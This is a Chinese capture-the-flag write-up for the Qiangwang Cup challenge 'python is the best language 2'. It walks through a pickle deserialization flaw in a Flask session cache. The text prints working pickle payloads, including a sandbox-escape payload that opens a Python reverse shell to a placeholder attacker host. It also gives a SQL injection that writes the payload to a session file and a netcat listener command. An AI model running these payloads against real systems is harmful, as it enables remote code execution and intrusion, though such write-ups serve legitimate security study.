參考文獻：https://xz.aliyun.com/t/2219
http://120.77.209.122/index.php/archives/25/

源碼下載下來后，是基于flask框架，先查看路由文件routes.py，里面功能大部分是基于登陸的。

在others.py的最后有這樣的內容

2.png

load()函數有一個unpkler函數用于反序列化參數(file)，如果file可控那么這就是一個反序列化漏洞。

借用下大佬的payload，理解下這個。

用下面的腳本(12.py)進行序列化payload的生成：

import os from pickle import Pickler as Pkler import commands class hhh(object):def __reduce__(self):return (os.system,("whoami",)) evil = hhh()def dump(file):pkler = Pkler(file)pkler.dump(evil)with open("test","wb") as f:dump(f)

測試反序列化漏洞(13.py):

from pickle import Unpickler as Unpkler from io import open as Open def LOAD(file):unpkler = Unpkler(file)return Unpkler(file).load()with Open("test","rb") as f:LOAD(f)

執行會12.py后，會在12.py的同級目錄下生成test，執行13.py會顯示出用戶信息

全局搜索load()函數，發現它在Mycache.py的FileSystemCache類中有多次引用。（代碼太長了，貼下有用的）

2.png
跟入_get_filename方法
2.png
可以看到將傳入的字符串key進行MD5，并將其返回。通過全局搜索，發現在Mysession.py的open_session中調用了key
2.png
1.png

其中self.key_prefix為bdwsessions，因此假設cookie中的sesssion值為pleated，則self.key_prefix + sid即為bdwsessionspleated，然后這串字符串進行MD5得到的結果0ab5423aafb316e9c299e0bb853d0c11。這樣就可以控制file了。

攻擊流程
①本地生成序列化文件，并且進行十六進制編碼
②通過第一關的sql注入，將本地生成的payload,寫入服務器上的session文件，指定文件名為MD5(bdwsessionspleated),這樣我們在訪問/index的時候把cookie中的session值改為pleated，觸發open_session中的self.cache.get就可以進行反序列化攻擊了

沙箱逃逸
源碼還設置了沙箱/黑名單來防止某些函數的執行，比如前面的os.system就被禁用了

2.png
此處過濾了大多數函數，但是commands.getoutput和subprocess.Popen()并沒有過濾,payload用的是commands.getoutput

import cPickle import commandsclass Exp(object):def __reduce__(self):return (commands.getoutput,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",)) e = Exp() poc = cPickle.dumps(e) print '0x'+poc.encode('hex')

在注冊的郵箱處填入：

test12'/**/union/**/select/**/0x63636f....../**/into/**/dumpfile/**/'/tmp/ffff/0ab5423aafb316e9c299e0bb853d0c11'#@test12.com

注冊后出現Please use a different email address.。說明寫入成功
然后訪問http://39.107.32.29/:20000/index
抓包修改session值為pleated

反彈shell

nc -l -p 8181 -vvv

查看flag即可。

總結

以上是生活随笔為你收集整理的复现强网杯python is the best language 2的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。